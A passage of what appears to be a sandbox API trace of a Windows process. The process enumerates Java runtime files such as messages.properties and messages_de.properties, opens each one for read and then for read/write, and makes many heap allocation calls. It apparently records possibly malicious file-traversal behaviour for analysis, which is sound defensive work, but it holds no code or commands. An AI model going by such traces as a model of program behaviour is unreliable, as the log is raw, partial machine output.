out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.849] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb2c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages.properties", cAlternateFileName="MESSAG~1.PRO")) returned 1 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0094.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0094.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0094.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0094.850] AreFileApisANSI () returned 1 [0094.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties", lpUsedDefaultChar=0x0) returned 66 [0094.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0094.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.851] AreFileApisANSI () returned 1 [0094.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0094.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82568 [0094.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 66 [0094.851] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.851] GetFileType (hFile=0x368) returned 0x1 [0094.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0094.851] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.851] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.852] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.852] CloseHandle (hObject=0x368) returned 1 [0094.852] AreFileApisANSI () returned 1 [0094.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0094.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82688 [0094.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 66 [0094.852] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.852] GetFileType (hFile=0x368) returned 0x1 [0094.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0094.852] CloseHandle (hObject=0x368) returned 1 [0094.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0094.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0094.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.854] AreFileApisANSI () returned 1 [0094.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82e68 [0094.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82e68, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 66 [0094.854] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb2c)) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82e68 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0094.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.854] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_de.properties", cAlternateFileName="MESSAG~2.PRO")) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0094.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0094.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0094.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0094.855] AreFileApisANSI () returned 1 [0094.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties", lpUsedDefaultChar=0x0) returned 69 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0094.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.856] AreFileApisANSI () returned 1 [0094.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0094.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 69 [0094.856] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.856] GetFileType (hFile=0x368) returned 0x1 [0094.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0094.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.857] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.857] CloseHandle (hObject=0x368) returned 1 [0094.857] AreFileApisANSI () returned 1 [0094.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0094.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 69 [0094.857] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.857] GetFileType (hFile=0x368) returned 0x1 [0094.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0094.857] CloseHandle (hObject=0x368) returned 1 [0094.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.858] HeapFree 